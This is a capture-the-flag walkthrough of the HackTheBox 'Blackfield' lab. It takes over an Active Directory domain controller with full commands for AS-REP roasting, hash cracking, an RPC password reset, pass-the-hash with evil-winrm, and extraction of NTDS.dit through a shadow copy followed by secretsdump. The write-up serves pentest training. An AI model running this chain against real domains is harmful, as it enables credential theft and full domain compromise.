24. HackTheBox. Level Hard: Blackfield Walkthrough. Domain Controller Capture via SMB and RPC, LPE via Shadow Copy

2 January 2025 5 minutes Author: Lady Liberty

The Blackfield challenge on HackTheBox is perfect for improving your pentesting skills. You will learn how to use nmap, work with Active Directory, and escalate privileges on Windows systems using mimikatz and Evil-WinRM.

Quick guide

The article describes the use of ASRep Roasting to identify users, the use of RPC to change passwords and capture accounts, and the elevation of privilege using the shadow copy of NTDS.DIT.

The connection to the lab is via VPN. For security reasons, it is not recommended to use a work computer or devices with sensitive data, as the connection is to a private network with experienced information security professionals.

Recon

This machine has an IP address of 10.10.10.192, which I add to /etc/hosts.

10.10.10.192 	blackfield.htb

First, open ports are scanned using a script that accepts one argument — the host address to scan:

#!/bin/bash
ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -A $1

We see a lot of open ports, but as always, let’s start with SMB.

smbmap -u anonymous -H 10.10.10.192

And the profiles$ directory is available for reading.

smbmap -u anonymous -H 10.10.10.192 -r 'profiles$'2

We have a large list of possible users. We can check which users are actually present in the system. The fact is that in the case of an ASRep Roasting attack, the server has three different responses:

  • hash of the user’s password;

  • this user does not have UAF Dont Require PreAuth;

  • this user does not exist in the Kerberos database.

That way, we can find out who is there and who is not.

Entry Point

First, let’s get a list.

smbmap -u anonymous -H 10.10.10.192 -r 'profiles$' | grep 2020 | awk -F ' ' '{print $8}' > users.txt

Now let’s perform ASRep-Roasting.

GetNPUsers.py blackfield.local/ -dc-ip 10.10.10.192 -k -no-pass -usersfile ./users.txt

It was unexpected to get a hash in response. The next step is to crack it.

john support.hash -w=./tools/rockyou.txt

And we have a whole account under control. Now let’s get as much information as possible using enum4linux.

enum4linux -u support -p '#00^BlackKnight' -a 10.10.10.192 2>/dev/null

The dump produces a large list of users, but the most valuable information is the group membership. In particular, it turned out that the svc_backup account belongs to the RMU group (RID: 580), which provides remote connection via Win-RM.

The data from SMB no longer contains useful information, and LDAP also does not provide anything valuable. However, RPC turned out to be useful due to one feature. The next step is to connect to it:

rpcclient 10.10.10.192 -U support

A special feature is the ability to change the password of a user with the same privileges. This method is described in detail in the sources and has been successfully applied for the user audit2020.

setuserinfo2 audit2020 18 'ralf'

Now we start analyzing all resources and services from the beginning, because we have another controlled account.

USER

Let’s go to SMB.

smbmap -u audit2020 -p ralf -d blackfield.local -H 10.10.10.192

There is a lot to read, it is better to output all the content recursively and view it in one go.

smbmap -u audit2020 -p ralf -d blackfield.local -H 10.10.10.192 -R

In the forensic\memory_analysis folder we find, apparently, a dump of the lsass process. And from it we can get passwords using mimikatz. We download this file.

smbclient.py blackfield.local/audit2020:[email protected]

Now let’s switch to a Windows machine and use mimikatz.

Knowing the hash, we use Evil-WinRM to connect on behalf of svc_backup.

evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d

ROOT

Let’s look at the user’s groups and privileges.

We have the SeBackupPrivilege privilege. This gives us the right to create a shadow copy of the NTDS file, which contains a large amount of credentials. Once we create a copy, we cannot simply extract the required file. For this, we will need the following DLL libraries.

Let’s make a shadow copy. Let’s create a file with the following contents.

SET CONTEXT PERSISTENT NOWRITERS
add volume c: alias ralfcopy
create
expose %ralfcopy% z:

And now let’s upload it and the downloaded libraries to the host.

Let’s perform a shadow copy.

diskshadow /s ds.txt

And we will give you the file.

Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit C:\Temp\ntds.dit

The file is encrypted, and to decrypt it you need the SYSTEM file, which is easy to obtain.

reg save HKLM\SYSTEM C:\Temp\SYSTEM

We download both files from the machine.

We extract the hashes using the secretsdump utility from the impacket package.

secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

Let’s connect as an administrator.

evil-winrm -i 10.10.10.192 -u Administrator -H 184fb5e5178480be64824d4cd53b99ee

Full control over this machine has been obtained.

Conclusion

The use of ASRep Roasting for user identification, RPC for password change, secretsdump from impacket for hash extraction, and working with NTDS.DIT ​​shadow copy were demonstrated. The approaches covered showed technical competence in the field of pentesting and information security.

Other related articles
Found an error?
If you find an error, take a screenshot and send it to the bot.